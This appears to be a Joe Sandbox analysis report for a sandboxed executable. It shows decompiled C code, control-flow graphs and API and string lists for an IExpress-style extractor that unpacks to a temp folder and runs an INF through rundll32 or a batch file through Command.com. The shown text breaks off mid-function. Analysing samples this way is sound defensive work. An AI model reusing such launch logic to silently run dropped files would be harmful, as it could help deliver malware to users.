                                                                                                                                                                                                                                              control_flow_graph 141 971ae8-971b2c call 971680 144 971b2e-971b39 141->144 145 971b3b-971b40 141->145 146 971b46-971b61 call 971a84 144->146 145->146 149 971b63-971b65 146->149 150 971b9f-971bc2 call 971781 call 97658a 146->150 152 971b68-971b6d 149->152 157 971bc7-971bd3 call 9766c8 150->157 152->152 154 971b6f-971b74 152->154 154->150 156 971b76-971b7b 154->156 158 971b83-971b86 156->158 159 971b7d-971b81 156->159 165 971d73-971d7f call 9766c8 157->165 166 971bd9-971bf1 CompareStringA 157->166 158->150 162 971b88-971b8a 158->162 159->158 161 971b8c-971b9d call 971680 159->161 161->157 162->150 162->161 175 971d81-971d99 CompareStringA 165->175 176 971df8-971e09 LocalAlloc 165->176 166->165 168 971bf7-971c07 GetFileAttributesA 166->168 170 971d53-971d5e 168->170 171 971c0d-971c15 168->171 173 971d64-971d6e call 9744b9 170->173 171->170 174 971c1b-971c33 call 971a84 171->174 188 971e94-971ea4 call 976ce0 173->188 190 971c35-971c38 174->190 191 971c50-971c61 LocalAlloc 174->191 175->176 181 971d9b-971da2 175->181 178 971dd4-971ddf 176->178 179 971e0b-971e1b GetFileAttributesA 176->179 178->173 183 971e67-971e73 call 971680 179->183 184 971e1d-971e1f 179->184 186 971da5-971daa 181->186 194 971e78-971e84 call 972aac 183->194 184->183 189 971e21-971e3e call 971781 184->189 186->186 192 971dac-971db4 186->192 189->194 211 971e40-971e43 189->211 197 971c40-971c4b call 971a84 190->197 198 971c3a 190->198 191->178 193 971c67-971c72 191->193 199 971db7-971dbc 192->199 200 971c74 193->200 201 971c79-971cc0 GetPrivateProfileIntA GetPrivateProfileStringA 193->201 210 971e89-971e92 194->210 197->191 198->197 199->199 206 971dbe-971dd2 LocalAlloc 199->206 200->201 208 971cc2-971ccc 201->208 209 971cf8-971d07 201->209 206->178 207 971de1-971df3 call 97171e 206->207 207->210 213 971cd3-971cf3 call 971680 * 2 208->213 214 971cce 208->214 216 971d23 209->216 217 971d09-971d21 GetShortPathNameA 209->217 210->188 211->194 215 971e45-971e65 call 9716b3 * 2 211->215 213->210 214->213 215->194 221 971d28-971d2b 216->221 217->221 224 971d32-971d4e call 97171e 221->224 225 971d2d 221->225 224->210 225->224
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00971AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v527;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				char _v1552;
                                                                                                                                                                                                                                              				CHAR* _v1556;
                                                                                                                                                                                                                                              				int* _v1560;
                                                                                                                                                                                                                                              				CHAR** _v1564;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t48;
                                                                                                                                                                                                                                              				CHAR* _t53;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				char* _t57;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				CHAR* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				signed char _t65;
                                                                                                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                                                              				unsigned int _t85;
                                                                                                                                                                                                                                              				CHAR* _t90;
                                                                                                                                                                                                                                              				CHAR* _t92;
                                                                                                                                                                                                                                              				char _t105;
                                                                                                                                                                                                                                              				char _t106;
                                                                                                                                                                                                                                              				CHAR** _t111;
                                                                                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                                                                              				CHAR* _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                                                                              				void* _t139;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				intOrPtr* _t146;
                                                                                                                                                                                                                                              				char* _t148;
                                                                                                                                                                                                                                              				CHAR* _t151;
                                                                                                                                                                                                                                              				void* _t152;
                                                                                                                                                                                                                                              				CHAR* _t155;
                                                                                                                                                                                                                                              				CHAR* _t156;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				signed int _t158;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t48 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                              				_t108 = __ecx;
                                                                                                                                                                                                                                              				_v1564 = _a4;
                                                                                                                                                                                                                                              				_v1560 = _a8;
                                                                                                                                                                                                                                              				E00971680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                              				if(_v528 != 0x22) {
                                                                                                                                                                                                                                              					_t135 = " ";
                                                                                                                                                                                                                                              					_t53 =  &_v528;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t135 = "\"";
                                                                                                                                                                                                                                              					_t53 =  &_v527;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t111 =  &_v1556;
                                                                                                                                                                                                                                              				_v1556 = _t53;
                                                                                                                                                                                                                                              				_t54 = E00971A84(_t111, _t135);
                                                                                                                                                                                                                                              				_t156 = _v1556;
                                                                                                                                                                                                                                              				_t151 = _t54;
                                                                                                                                                                                                                                              				if(_t156 == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_push(_t111);
                                                                                                                                                                                                                                              					E00971781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              					E0097658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t132 = _t156;
                                                                                                                                                                                                                                              					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t105 =  *_t132;
                                                                                                                                                                                                                                              						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                              					} while (_t105 != 0);
                                                                                                                                                                                                                                              					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                              					if(_t111 < 3) {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t106 = _t156[1];
                                                                                                                                                                                                                                              					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                              						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L11;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						E00971680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t138 = 0x2e;
                                                                                                                                                                                                                                              						_t57 = E009766C8(_t156, _t138);
                                                                                                                                                                                                                                              						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                              							_t139 = 0x2e;
                                                                                                                                                                                                                                              							_t115 = _t156;
                                                                                                                                                                                                                                              							_t58 = E009766C8(_t115, _t139);
                                                                                                                                                                                                                                              							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                              								if(_t156 == 0) {
                                                                                                                                                                                                                                              									goto L43;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                              								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              									E00971680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_push(_t115);
                                                                                                                                                                                                                                              									_t108 = 0x400;
                                                                                                                                                                                                                                              									E00971781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                              									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                              										E009716B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                              										E009716B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t140 = _t156;
                                                                                                                                                                                                                                              								 *_t156 = 0;
                                                                                                                                                                                                                                              								E00972AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                              								goto L53;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                              								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                              								_t145 = _t125 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t76 =  *_t125;
                                                                                                                                                                                                                                              									_t125 = _t125 + 1;
                                                                                                                                                                                                                                              								} while (_t76 != 0);
                                                                                                                                                                                                                                              								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                              								_t146 =  &_v268;
                                                                                                                                                                                                                                              								_t157 = _t146 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t77 =  *_t146;
                                                                                                                                                                                                                                              									_t146 = _t146 + 1;
                                                                                                                                                                                                                                              								} while (_t77 != 0);
                                                                                                                                                                                                                                              								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                              								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                              								if(_t156 != 0) {
                                                                                                                                                                                                                                              									E0097171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L43;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                              								_t140 = 0x525;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_t60 =  &_v268;
                                                                                                                                                                                                                                              								goto L35;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t140 = "[";
                                                                                                                                                                                                                                              								_v1556 = _t151;
                                                                                                                                                                                                                                              								_t90 = E00971A84( &_v1556, "[");
                                                                                                                                                                                                                                              								if(_t90 != 0) {
                                                                                                                                                                                                                                              									if( *_t90 != 0) {
                                                                                                                                                                                                                                              										_v1556 = _t90;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t140 = "]";
                                                                                                                                                                                                                                              									E00971A84( &_v1556, "]");
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                              								if(_t156 == 0) {
                                                                                                                                                                                                                                              									L43:
                                                                                                                                                                                                                                              									_t60 = 0;
                                                                                                                                                                                                                                              									_t140 = 0x4b5;
                                                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                                                              									_push(0x10);
                                                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                                                              									L35:
                                                                                                                                                                                                                                              									_push(_t60);
                                                                                                                                                                                                                                              									E009744B9(0, _t140);
                                                                                                                                                                                                                                              									_t62 = 0;
                                                                                                                                                                                                                                              									goto L54;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t155 = _v1556;
                                                                                                                                                                                                                                              									_t92 = _t155;
                                                                                                                                                                                                                                              									if( *_t155 == 0) {
                                                                                                                                                                                                                                              										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									 *0x979120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                              									 *_v1560 = 1;
                                                                                                                                                                                                                                              									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x971140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                              										 *0x979a34 =  *0x979a34 & 0xfffffffb;
                                                                                                                                                                                                                                              										if( *0x979a40 != 0) {
                                                                                                                                                                                                                                              											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t108 = "setupx.dll";
                                                                                                                                                                                                                                              											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_push( &_v268);
                                                                                                                                                                                                                                              										_push(_t155);
                                                                                                                                                                                                                                              										E0097171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										 *0x979a34 =  *0x979a34 | 0x00000004;
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										E00971680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                              										_t140 = 0x200;
                                                                                                                                                                                                                                              										E00971680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L53:
                                                                                                                                                                                                                                              									_t62 = 1;
                                                                                                                                                                                                                                              									 *_v1564 = _t156;
                                                                                                                                                                                                                                              									L54:
                                                                                                                                                                                                                                              									_pop(_t152);
                                                                                                                                                                                                                                              									return E00976CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}














































                                                                                                                                                                                                                                              0x00971af3
                                                                                                                                                                                                                                              0x00971afa
                                                                                                                                                                                                                                              0x00971b07
                                                                                                                                                                                                                                              0x00971b09
                                                                                                                                                                                                                                              0x00971b1a
                                                                                                                                                                                                                                              0x00971b20
                                                                                                                                                                                                                                              0x00971b2c
                                                                                                                                                                                                                                              0x00971b3b
                                                                                                                                                                                                                                              0x00971b40
                                                                                                                                                                                                                                              0x00971b2e
                                                                                                                                                                                                                                              0x00971b2e
                                                                                                                                                                                                                                              0x00971b33
                                                                                                                                                                                                                                              0x00971b33
                                                                                                                                                                                                                                              0x00971b46
                                                                                                                                                                                                                                              0x00971b4c
                                                                                                                                                                                                                                              0x00971b52
                                                                                                                                                                                                                                              0x00971b57
                                                                                                                                                                                                                                              0x00971b5d
                                                                                                                                                                                                                                              0x00971b61
                                                                                                                                                                                                                                              0x00971b9f
                                                                                                                                                                                                                                              0x00971b9f
                                                                                                                                                                                                                                              0x00971bb1
                                                                                                                                                                                                                                              0x00971bc2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971b63
                                                                                                                                                                                                                                              0x00971b63
                                                                                                                                                                                                                                              0x00971b65
                                                                                                                                                                                                                                              0x00971b68
                                                                                                                                                                                                                                              0x00971b68
                                                                                                                                                                                                                                              0x00971b6a
                                                                                                                                                                                                                                              0x00971b6b
                                                                                                                                                                                                                                              0x00971b6f
                                                                                                                                                                                                                                              0x00971b74
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971b76
                                                                                                                                                                                                                                              0x00971b7b
                                                                                                                                                                                                                                              0x00971b86
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971b8c
                                                                                                                                                                                                                                              0x00971b8c
                                                                                                                                                                                                                                              0x00971b98
                                                                                                                                                                                                                                              0x00971bc7
                                                                                                                                                                                                                                              0x00971bc9
                                                                                                                                                                                                                                              0x00971bcc
                                                                                                                                                                                                                                              0x00971bd3
                                                                                                                                                                                                                                              0x00971d75
                                                                                                                                                                                                                                              0x00971d76
                                                                                                                                                                                                                                              0x00971d78
                                                                                                                                                                                                                                              0x00971d7f
                                                                                                                                                                                                                                              0x00971e05
                                                                                                                                                                                                                                              0x00971e09
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971e12
                                                                                                                                                                                                                                              0x00971e1b
                                                                                                                                                                                                                                              0x00971e73
                                                                                                                                                                                                                                              0x00971e21
                                                                                                                                                                                                                                              0x00971e21
                                                                                                                                                                                                                                              0x00971e28
                                                                                                                                                                                                                                              0x00971e37
                                                                                                                                                                                                                                              0x00971e3e
                                                                                                                                                                                                                                              0x00971e52
                                                                                                                                                                                                                                              0x00971e60
                                                                                                                                                                                                                                              0x00971e60
                                                                                                                                                                                                                                              0x00971e3e
                                                                                                                                                                                                                                              0x00971e79
                                                                                                                                                                                                                                              0x00971e7b
                                                                                                                                                                                                                                              0x00971e84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971d9b
                                                                                                                                                                                                                                              0x00971d9b
                                                                                                                                                                                                                                              0x00971da0
                                                                                                                                                                                                                                              0x00971da2
                                                                                                                                                                                                                                              0x00971da5
                                                                                                                                                                                                                                              0x00971da5
                                                                                                                                                                                                                                              0x00971da7
                                                                                                                                                                                                                                              0x00971da8
                                                                                                                                                                                                                                              0x00971dac
                                                                                                                                                                                                                                              0x00971dae
                                                                                                                                                                                                                                              0x00971db4
                                                                                                                                                                                                                                              0x00971db7
                                                                                                                                                                                                                                              0x00971db7
                                                                                                                                                                                                                                              0x00971db9
                                                                                                                                                                                                                                              0x00971dba
                                                                                                                                                                                                                                              0x00971dbe
                                                                                                                                                                                                                                              0x00971dc3
                                                                                                                                                                                                                                              0x00971dce
                                                                                                                                                                                                                                              0x00971dd2
                                                                                                                                                                                                                                              0x00971deb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971df0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971dd2
                                                                                                                                                                                                                                              0x00971bf7
                                                                                                                                                                                                                                              0x00971bfe
                                                                                                                                                                                                                                              0x00971c07
                                                                                                                                                                                                                                              0x00971d55
                                                                                                                                                                                                                                              0x00971d5a
                                                                                                                                                                                                                                              0x00971d5b
                                                                                                                                                                                                                                              0x00971d5d
                                                                                                                                                                                                                                              0x00971d5e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971c1b
                                                                                                                                                                                                                                              0x00971c1b
                                                                                                                                                                                                                                              0x00971c20
                                                                                                                                                                                                                                              0x00971c2c
                                                                                                                                                                                                                                              0x00971c33
                                                                                                                                                                                                                                              0x00971c38
                                                                                                                                                                                                                                              0x00971c3a
                                                                                                                                                                                                                                              0x00971c3a
                                                                                                                                                                                                                                              0x00971c40
                                                                                                                                                                                                                                              0x00971c4b
                                                                                                                                                                                                                                              0x00971c4b
                                                                                                                                                                                                                                              0x00971c5d
                                                                                                                                                                                                                                              0x00971c61
                                                                                                                                                                                                                                              0x00971dd4
                                                                                                                                                                                                                                              0x00971dd4
                                                                                                                                                                                                                                              0x00971dd6
                                                                                                                                                                                                                                              0x00971ddb
                                                                                                                                                                                                                                              0x00971ddc
                                                                                                                                                                                                                                              0x00971dde
                                                                                                                                                                                                                                              0x00971d64
                                                                                                                                                                                                                                              0x00971d64
                                                                                                                                                                                                                                              0x00971d67
                                                                                                                                                                                                                                              0x00971d6c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971c67
                                                                                                                                                                                                                                              0x00971c67
                                                                                                                                                                                                                                              0x00971c6d
                                                                                                                                                                                                                                              0x00971c72
                                                                                                                                                                                                                                              0x00971c74
                                                                                                                                                                                                                                              0x00971c74
                                                                                                                                                                                                                                              0x00971c8e
                                                                                                                                                                                                                                              0x00971c99
                                                                                                                                                                                                                                              0x00971cc0
                                                                                                                                                                                                                                              0x00971cf8
                                                                                                                                                                                                                                              0x00971d07
                                                                                                                                                                                                                                              0x00971d23
                                                                                                                                                                                                                                              0x00971d09
                                                                                                                                                                                                                                              0x00971d14
                                                                                                                                                                                                                                              0x00971d1b
                                                                                                                                                                                                                                              0x00971d1b
                                                                                                                                                                                                                                              0x00971d2b
                                                                                                                                                                                                                                              0x00971d2d
                                                                                                                                                                                                                                              0x00971d2d
                                                                                                                                                                                                                                              0x00971d38
                                                                                                                                                                                                                                              0x00971d39
                                                                                                                                                                                                                                              0x00971d46
                                                                                                                                                                                                                                              0x00971cc2
                                                                                                                                                                                                                                              0x00971cc2
                                                                                                                                                                                                                                              0x00971ccc
                                                                                                                                                                                                                                              0x00971cce
                                                                                                                                                                                                                                              0x00971cce
                                                                                                                                                                                                                                              0x00971cdb
                                                                                                                                                                                                                                              0x00971ce6
                                                                                                                                                                                                                                              0x00971cee
                                                                                                                                                                                                                                              0x00971cee
                                                                                                                                                                                                                                              0x00971e89
                                                                                                                                                                                                                                              0x00971e91
                                                                                                                                                                                                                                              0x00971e92
                                                                                                                                                                                                                                              0x00971e94
                                                                                                                                                                                                                                              0x00971e97
                                                                                                                                                                                                                                              0x00971ea4
                                                                                                                                                                                                                                              0x00971ea4
                                                                                                                                                                                                                                              0x00971c61
                                                                                                                                                                                                                                              0x00971c07
                                                                                                                                                                                                                                              0x00971bd3
                                                                                                                                                                                                                                              0x00971b7b

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00971BE7
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00971BFE
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00971C57
                                                                                                                                                                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 00971C88
                                                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00971140,00000000,00000008,?), ref: 00971CB8
                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00971D1B
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                              • API String ID: 383838535-2280873615
                                                                                                                                                                                                                                              • Opcode ID: 4ec3e225da21e3e43e60eca03cbf7e04126821bdb2177e1f116ace8d4a51ec65
                                                                                                                                                                                                                                              • Instruction ID: 6cee843182894fe953bee115477bcb233d725f5e00df13b9874ac153ba12c048
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ec3e225da21e3e43e60eca03cbf7e04126821bdb2177e1f116ace8d4a51ec65
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BA13873A082145BEB309B2CCC45BEA77AD9BC1310F14C6A5E59DA72C1EBB09EC5CB54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 324 97597d-9759b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 9759dd-975a1b GetDiskFreeSpaceA 324->325 326 9759bb-9759d8 call 9744b9 call 976285 324->326 328 975ba1-975bde memset call 976285 GetLastError FormatMessageA 325->328 329 975a21-975a4a MulDiv 325->329 341 975c05-975c14 call 976ce0 326->341 338 975be3-975bfc call 9744b9 SetCurrentDirectoryA 328->338 329->328 332 975a50-975a6c GetVolumeInformationA 329->332 335 975ab5-975aca SetCurrentDirectoryA 332->335 336 975a6e-975ab0 memset call 976285 GetLastError FormatMessageA 332->336 340 975acc-975ad1 335->340 336->338 353 975c02 338->353 344 975ad3-975ad8 340->344 345 975ae2-975ae4 340->345 344->345 349 975ada-975ae0 344->349 346 975ae7-975af8 345->346 347 975ae6 345->347 352 975af9-975afb 346->352 347->346 349->340 349->345 354 975b05-975b08 352->354 355 975afd-975b03 352->355 356 975c04 353->356 357 975b20-975b27 354->357 358 975b0a-975b1b call 9744b9 354->358 355->352 355->354 356->341 360 975b52-975b5b 357->360 361 975b29-975b33 357->361 358->353 364 975b62-975b6d 360->364 361->360 363 975b35-975b50 361->363 363->364 365 975b76-975b7d 364->365 366 975b6f-975b74 364->366 368 975b83 365->368 369 975b7f-975b81 365->369 367 975b85 366->367 370 975b87-975b94 call 97268b 367->370 371 975b96-975b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                                                              			E0097597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v788;
                                                                                                                                                                                                                                              				long _v792;
                                                                                                                                                                                                                                              				long _v796;
                                                                                                                                                                                                                                              				long _v800;
                                                                                                                                                                                                                                              				signed int _v804;
                                                                                                                                                                                                                                              				long _v808;
                                                                                                                                                                                                                                              				int _v812;
                                                                                                                                                                                                                                              				long _v816;
                                                                                                                                                                                                                                              				long _v820;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                                                                              				signed short _t78;
                                                                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                                                                              				int _t102;
                                                                                                                                                                                                                                              				unsigned int _t103;
                                                                                                                                                                                                                                              				unsigned int _t105;
                                                                                                                                                                                                                                              				signed int _t111;
                                                                                                                                                                                                                                              				long _t112;
                                                                                                                                                                                                                                              				signed int _t116;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				signed int _t119;
                                                                                                                                                                                                                                              				signed int _t120;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t114 = __edi;
                                                                                                                                                                                                                                              				_t46 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                              				_v804 = __edx;
                                                                                                                                                                                                                                              				_t118 = __ecx;
                                                                                                                                                                                                                                              				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                              				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                              				if(_t50 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					_v796 = 0;
                                                                                                                                                                                                                                              					_v792 = 0;
                                                                                                                                                                                                                                              					_v800 = 0;
                                                                                                                                                                                                                                              					_v808 = 0;
                                                                                                                                                                                                                                              					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                              					__eflags = _t55;
                                                                                                                                                                                                                                              					if(_t55 == 0) {
                                                                                                                                                                                                                                              						L29:
                                                                                                                                                                                                                                              						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              						 *0x979124 = E00976285();
